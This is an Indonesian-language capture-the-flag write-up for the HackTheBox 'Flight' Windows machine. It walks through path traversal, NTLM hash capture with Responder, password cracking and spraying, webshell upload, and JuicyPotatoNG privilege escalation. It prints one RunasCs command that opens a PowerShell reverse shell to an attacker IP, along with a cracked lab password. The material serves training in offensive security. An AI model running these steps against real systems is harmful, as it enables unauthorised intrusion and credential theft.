skip to content
Yupy Syntax

HackTheBox - Flight

/ 5 min read

Last Updated:

HackTheBox Flight Write Up

Information Gathering

Scanning dengan nmap. Berikut port terbuka sebagai berikut:

Terminal window
┌──(root㉿yupy)-[~/yp/hackthebox/Flight]
└─# nmap -sC -sV 10.10.11.187
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-21 17:43 PST
Nmap scan report for 10.10.11.187
Host is up (0.035s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: g0 Aviation
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-12-22 08:44:09Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h00m01s
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-12-22T08:44:13
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.81 seconds

Scanning dengan Nikto untuk melihat vulnerability Assessment yang ada: alt text

Fuzzing directory dengan berbagai tools Dirsearch dan Dirb: alt text alt text

Fuzzing subdomain flight.htb dengan wfuzz tools, disini kita menemukan subdomain school. alt text

Exploitation

Kita juga menggunakan tools scanning Burp Suite, dari scan deep dari BurpSuite kami menemukan kerentanan tentang File Path Travesal yang ada pada parameter view:. Disini bila menggunakan payload file:///c:/windows/win.ini yang telah kita encode urlnya. Kita bisa melihat version pada windows tersebut dengan payload ini. alt text alt text alt text

Dari kita mencoba melihat file lokal di server, kita dapat mencoba RFI yang berpontial SSRF juga di server target, sehingga bila kita menginputkan url server kita akan mengautentikasi dan menunjukkan kepada kita hash ntlmv2 dari pengguna yang sedang berjalan, seperti di server yang merespons, disini kita menggunakan responder untuk mendapatkan responya: alt text alt text alt text

Setelah mendapatkan hash ntmlv2 kita juga crack hash tersebut dengan tools John, dan disini kita mendapatkan password: alt text

Kita disini mencoba mencocokan password kredensial yang terhubung dengan smb server target tersebut, dan kita mendapatkanya bila password itu cocok dengan user svc_apache alt text

Kita melanjutkanya untuk melihat user lain yang ada di Smb server target. Disini kita melihat semua user yang ada pada Smb server target tersebut. alt text alt text

Setelah kami membuat file dengan user yang didapat tadi, dan disini kita mencoba mencocokan kredential lagi. Disini kita mendapatkan users dengan password yang cocok selain svc_apache yaitu S.Moon. alt text alt text alt text

S.Moon menggunakannya, kita dapat mencari direktori seseorang yang memiliki izin. alt text

Post Exploitation

Kita mencoba login dengan smbclient dan kita dapat masuk. Disini tidak ada file apapun namun kita mencoba memasukan payload yang saya dapatkan dari hacktricks alt text

Disini kita membuat payload yang nantinya kita akan mendapatkan Hash lagi dari response backconnect: alt text alt text alt text

Seperti biasa untuk crack hash ntmlv2 yang di dapat dari backconnect tadi, dan mendapatkanya passwordnya. alt text

Setelah kita crack passwordnya mencoba melihat directory share dengan user C.Bum dan password Tikkycoll_431012284. alt text

Disini kita mencoba login dengan user dan password tadi, terdapat directory flight.htb dan school.flight.htb yang berarti directory ini adalah directory yang memuat halaman page tadi. alt text

Setelah itu kita mencoba mengupload webshell wwwolf yang kita gunakan backconnect nantinya. alt text alt text

Setelah berhasil kita mengupload netcat yang didapat dari github: netcat yang kita akan upload ke dalam server. Berhasil terupload netcatnya kita backconnect an dengan netcat pc kita. alt text alt text

Disini mencoba privileges escalation pada server yang menggunakan windows ini, dengan menggunakan RunaCS ini kita dapat menjalakan command powershell lebih detail lagi. alt text

Dan kita sambungkan dengan netcat yang bila nanti kita buka akan menggunakan command powershell.

Terminal window
.\RunasCs.exe C.bum Tikkycoll_431012284 powershell -r 10.10.14.7:7333
alt text alt text

Priveleges Escalation

Bagaimana cara privileges escalation dengan server ini? Kita akan menemukanya, setelah kita melihat lihat isi server ini. alt text

Kita disini dapat melihat isi user.txt yang berada di user C.Bum tetapi kita tidak bisa melihat isi user administrator. alt text

Setelah mencari lebih dalam kita menemukan bahwa kalau kita membuka netstat dengan command netstat -oat kita akan melihat port 8000 yang berarti port ini mendapatkan isi web yang mungkin menampilkan halaman page baru. alt text

Kita disini menggunakan chisel untuk melihat yang ada pada port 8000 dengan cara menghubungkan port ini kedalam server kita. Dengan mengupload chisel yang saya dapatkan dari chisel jalankan chisel server target dan server pc kita sendiri. alt text alt text alt text

Disini bila kita membuka port 8000 dengan localhost akan memunculkan tampilan seperti gambar dibawah. alt text

Mencari dimana letak source code halaman page ini, dan kita menemukanya letak source code port 8000 di directory C:\inetpub\development alt text alt text

Selanjutnya kita mencoba upload shell cmd yang saya punyai. alt text alt text

Kita mencoba backconnect an lagi dengan netcat. Disini kami melakukan pencarian yang bisa untuk mendapatkan user Administrator secara langsung. alt text

Dengan menambahkan command whoami /priv kita dapat melihat bahwa memungkinkan privileges escalation. Referensi alt text

Disini kita menggunakan JuicyPotatoNG untuk menaikan user biasa ke user administrator. Dengan command dibawah kita bisa mendapatkan nt authority\system yang dapat melakukan eksekusi apapun yang terdapat di server. alt text alt text

Submit Flag in HackTheBox

alt text